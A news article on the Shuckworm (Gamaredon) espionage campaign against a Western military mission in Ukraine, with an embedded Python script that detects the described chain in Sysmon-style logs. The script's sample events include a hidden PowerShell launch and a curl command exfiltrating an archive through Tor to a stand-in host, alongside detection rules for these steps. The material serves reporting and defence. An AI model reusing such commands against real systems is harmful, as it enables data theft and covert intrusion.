Russian Espionage Group ‘Shuckworm’ Deploys New Malware to Spy on Western Forces in Ukraine

A Decade of Digital Espionage

A Russian-backed hacking group tracked as Shuckworm, also known as Gamaredon or Armageddon, has carried out a new espionage campaign, this time against a foreign military mission based in Ukraine. The group has been active since 2013 and has mostly targeted Ukrainian government offices, defense organizations, and law enforcement agencies. Security researchers link it to Russia's Federal Security Service (FSB). Its operations have continued throughout the Russia-Ukraine war, and this latest campaign shows the group remains active and dangerous.

The campaign was discovered by researchers at Symantec, who reported that the activity began on February 26 and continued into March. What makes it stand out is its target: a Western military mission on Ukrainian soil, a bolder choice than the Ukrainian agencies the group usually pursues.

In this attack Shuckworm used an updated version of its GammaSteel malware, an information stealer written in PowerShell, the scripting engine built into Windows. Running as a PowerShell script rather than as a compiled executable lets the malware enumerate a victim's files, pick out documents of interest, and send them to attacker-controlled servers while raising fewer alarms than a dropped binary would, because the interpreter doing the work is a legitimate, signed Windows component.

How the Attack Unfolded

The intrusion began in a simple but effective way. Shuckworm used an infected removable drive carrying a Windows shortcut file, D:\files.lnk. A shortcut can point at any command, not just a document, so opening it launched the attackers' code. That code added an entry to the Windows Registry so the malware would run again every time the computer restarted, giving the attackers a persistent foothold.

From there the attackers invoked mshta.exe, a legitimate, Microsoft-signed Windows binary that executes HTML Application and script content. Because it is a trusted system component, it is a common way of running attacker-supplied script without tripping controls that only block unknown executables. They followed this with a series of hidden commands run through wscript.exe, the Windows Script Host. These commands connected the infected computer to the group's command-and-control (C2) server, the infrastructure from which the attackers issue further commands and retrieve stolen data. Since both binaries ship with Windows, blocking them by hash or publisher is not practical; defenders instead watch for unusual parent-child relationships, such as mshta.exe or wscript.exe being started from a shortcut on removable media or spawning PowerShell.


After gaining access, Shuckworm widened its reach. The malware methodically infected every removable drive and network share it could reach from the compromised machine, so the infection did not stay on one device but spread into other parts of the organization's infrastructure.

On March 1 the attackers were seen carrying out a burst of activity on the compromised server. They ran tools to gather information about the system and set up two additional servers as fallback infrastructure, so they would keep control even if their primary access point was blocked. Such redundancy is a mark of how organized and persistent Shuckworm's operations are.

Military Documents and Methods of Theft

The attackers' objective soon became clear. Researchers recovered a set of stolen files whose names pointed to military planning and battlefield activity: inspection procedures, air defense orders, troop movements, wound reports, and casualty details. The contents have not been confirmed, but the names strongly suggest the group was after sensitive military information.

Once they had the files, the group needed a way to get the data out. Their primary channel was write.as, a public writing and publishing site, to which the stolen files were uploaded. As a fallback they used cURL, a standard command-line data-transfer tool, routed through Tor, the anonymity network, which hides the origin of the traffic. Because these are legitimate services and tools, the exfiltration traffic blends in with ordinary web activity, which is what helped the group stay hidden.
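The chain described under "How the Attack Unfolded" and the exfiltration paths above translate into a small set of telemetry checks. The Python script below is an added example, not code from Symantec or from the original article; it runs a handful of rules over Sysmon-style process, registry and network events. The events are constructed and simplified: the field names mirror Sysmon's ProcessCreate (1), NetworkConnect (3) and RegistryEvent (13) records, but the paths, command lines, registry value and upload URL are invented. Only write.as and Tor's default SOCKS ports come from the reporting.

```python
"""Triage Sysmon-style events for the chain in the article: a shortcut on a
removable drive, a Run-key entry for persistence, mshta.exe and wscript.exe
hand-offs, and exfiltration to write.as with cURL over Tor as the fallback.

Added example, not Symantec's or the article's code. The event records are
constructed; field names are Sysmon-like, the values are invented.
"""
import re

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
LOLBINS = SCRIPT_HOSTS | {"powershell.exe"}
EXFIL_HOSTS = {"write.as"}          # named in the report; extend from your own intel
TOR_SOCKS_PORTS = {9050, 9150}      # default SOCKS ports of the Tor daemon and Tor Browser
TOR_PROXY_ARG = re.compile(r"socks[45]\S*\s+\S*:(9050|9150)\b", re.I)

# Constructed telemetry: 1 = process create, 3 = network connect, 13 = registry value set.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Users\Public\files.hta"'},                 # shortcut opened
    {"id": 13, "target": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\files",
     "details": r"wscript.exe //B C:\Users\Public\files.vbs"},             # persistence
    {"id": 1, "image": r"C:\Windows\System32\wscript.exe", "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"wscript.exe //B C:\Users\Public\files.vbs"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"powershell.exe -w hidden -ep bypass -f C:\Users\Public\gs.ps1"},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_host": "write.as", "dest_port": 443},                            # primary exfil
    {"id": 1, "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"curl.exe --socks5-hostname 127.0.0.1:9050 -F file=@C:\Users\Public\out.zip https://example.invalid/up"},
    {"id": 3, "image": r"C:\Windows\System32\curl.exe", "dest_host": "127.0.0.1", "dest_port": 9050},
    # Benign noise so the rules have something to ignore.
    {"id": 1, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "chrome.exe"},
    {"id": 3, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "www.example.com", "dest_port": 443},
    {"id": 13, "target": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def run_key_script_host(ev):
    """Run-key value whose payload is a script host or PowerShell (persistence)."""
    if ev["id"] != 13 or "\\currentversion\\run\\" not in ev["target"].lower():
        return None
    if any(b in ev["details"].lower() for b in LOLBINS):
        return "run-key persistence: " + ev["details"]
    return None


def script_host_from_shell(ev):
    """mshta/wscript/cscript started directly by explorer.exe: a user opened something."""
    if ev["id"] == 1 and basename(ev["image"]) in SCRIPT_HOSTS and basename(ev["parent"]) == "explorer.exe":
        return "script host launched from shell: " + ev["cmdline"]
    return None


def lolbin_child_of_script_host(ev):
    """A script host handing off to another script host or PowerShell (the hidden-command chain)."""
    if ev["id"] == 1 and basename(ev["image"]) in LOLBINS and basename(ev["parent"]) in SCRIPT_HOSTS:
        return f"{basename(ev['parent'])} -> {basename(ev['image'])}: {ev['cmdline']}"
    return None


def exfil_indicator(ev):
    """Connection to a known upload host, or a client pointed at a local Tor SOCKS port."""
    if ev["id"] == 3:
        if ev["dest_host"].lower() in EXFIL_HOSTS:
            return f"{basename(ev['image'])} -> {ev['dest_host']}:{ev['dest_port']}"
        if ev["dest_host"] in {"127.0.0.1", "::1", "localhost"} and ev["dest_port"] in TOR_SOCKS_PORTS:
            return f"{basename(ev['image'])} -> local Tor SOCKS port {ev['dest_port']}"
    if ev["id"] == 1 and TOR_PROXY_ARG.search(ev["cmdline"]):
        return "Tor SOCKS proxy on command line: " + ev["cmdline"]
    return None


RULES = (run_key_script_host, script_host_from_shell, lolbin_child_of_script_host, exfil_indicator)


def triage(events):
    """Return (rule name, description) for every event that trips a rule."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append((rule.__name__, hit))
    return findings


if __name__ == "__main__":
    for name, text in triage(SAMPLE_EVENTS):
        print(f"[{name}] {text}")
```

Run against the constructed sample, the rules flag all seven malicious events and none of the three benign ones. In a real environment SAMPLE_EVENTS would be replaced by a Sysmon or EDR export, and the explorer-spawned-mshta rule will need tuning where legitimate HTA tooling exists; adding the drive type of the launching shortcut and the parent command line to the rule is the usual refinement.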


According to the researchers, the campaign showed that Shuckworm has become more skilled. The group leaned more heavily on PowerShell, made small but effective changes to its malware, and used legitimate-looking services to avoid attention. Together these made the attack chain more complex and harder to detect, a sign that the group's capabilities are growing.

This latest hacking operation is a reminder of the ongoing cyber war tied to the physical conflict in Ukraine. While soldiers fight on the ground, digital attackers like Shuckworm operate in the shadows, stealing secrets and undermining operations with a few lines of code.

Renuka Bangale